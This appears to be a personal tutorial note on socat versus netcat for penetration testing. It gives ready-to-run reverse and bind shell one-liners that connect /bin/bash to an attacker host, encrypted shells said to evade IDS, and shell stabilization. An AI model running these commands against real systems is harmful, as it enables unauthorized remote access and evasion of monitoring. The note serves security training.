Using “socat”
- author:: Nathan Acks
- date:: 2021-10-28
Socat: An anything-to-anything connector!
“socat” vs. “netcat”
Equivalent commands between socat and netcat:
# Reverse shell (attacker)
#
nc -lnp $LISTENER_PORT
socat TCP-LISTEN:$LISTENER_PORT -
# Reverse shell (target)
#
nc $ATTACKER_IP $LISTENER_PORT -e /bin/bash
socat TCP:$ATTACKER_IP:$LISTENER_PORT EXEC:"/bin/bash -li"
# Bind shell (attacker)
#
nc $TARGET_IP $LISTENER_PORT
socat TCP:$TARGET_IP:$LISTENER_PORT
# Bind shell (target)
#
nc -lnp $LISTENER_PORT -e /bin/bash
socat TCP-LISTEN:$LISTENER_PORT EXEC:"/bin/bash -li"
Socat gets us an interactive login shell right out the gate, though we’re still vulnerable to Ctrl+C. Note that when binding to PowerShell, use powershell.exe,pipes
in order to force PowerShell to use UNIX-style STDIN/STDOUT.
Socat Encrypted Shells
Socat can also make encrypted connections, which foil after-the-fact network analysis and may circumvent IDS entirely.
# Generate a self-signed certificate.
#
openssl req --newkey rsa:2048 -nodes \
-keyout shell.key -x509 -days 362 \
-out shell.crt
# Create a PEM file combining the certificate and key.
#
cat shell.key shell.crt > shell.pem
# Start a listener.
#
socat \
OPENSSL-LISTEN:$LISTENER_PORT,cert=shell.pem,verify=0 -
# Start the reverse shell on the target.
#
socat \
OPENSSL:$ATTACKER_IP:$LISTENER_PORT,verify=0 \
EXEC:"/bin/bash -li"
The verify=0
directive turns off certificate validation, so this isn’t a “secure” connection in the sense that it’s been authenticated, but it is secure in the sense that it’s encrypted.
Shell “Stabilization”
Shell “stabilization” refers to the process of making a remote shell behave like a normal local shell - so, allowing interactive programs to work properly, ensuring that input is not echoed inappropriately, etc.
We can use socat to create an auto-stabilized reverse shell on UNIX-like systems.
# Attacker: Connect $LISTENER_PORT to the current TTY,
# send raw keycodes, and turn off terminal echo.
# Basically the `stty raw -echo`.
#
socat TCP-LISTEN:$LISTENER_PORT FILE:`tty`,raw,echo=0
# Target: Connect the listener on the attacker to an
# interactive login bash shell.
#
# pty - allocate a PTTY
# stderr - redirect STDERR to the attacker
# sigint - pass signals (Ctrl+C) through
# setsid - use a new session
# sane - use a variety of tweaks to "normalize" the
# terminal's environment
#
socat TCP:$ATTACKER_IP:$LISTENER_PORT \
EXEC:"/bin/bash -li",pty,stderr,sigint,setsid,sane
Same thing, but over an encrypted connection:
# Attacker: Connect $LISTENER_PORT to the current TTY,
# send raw keycodes, and turn off terminal echo. Basically
# the `stty raw -echo`.
#
socat \
OPENSSL-LISTEN:$LISTENER_PORT,cert=$PEM_FILE,verify=0 \
FILE:`tty`,raw,echo=0
# Target: Connect the listener on the attacker to an
# interactive login bash shell.
#
# pty - allocate a PTTY
# stderr - redirect STDERR to the attacker
# sigint - pass signals (Ctrl+C) through
# setsid - use a new session
# sane - use a variety of tweaks to "normalize" the
# terminal's environment
#
socat \
OPENSSL:$ATTACKER_IP:$LISTENER_PORT,verify=0 \
EXEC:"/bin/bash -li",pty,stderr,sigint,setsid,sane
NOTE that the reverse shell will not pick up on your terminal size, so you’ll need to manually specify it using stty rows
and stty cols
.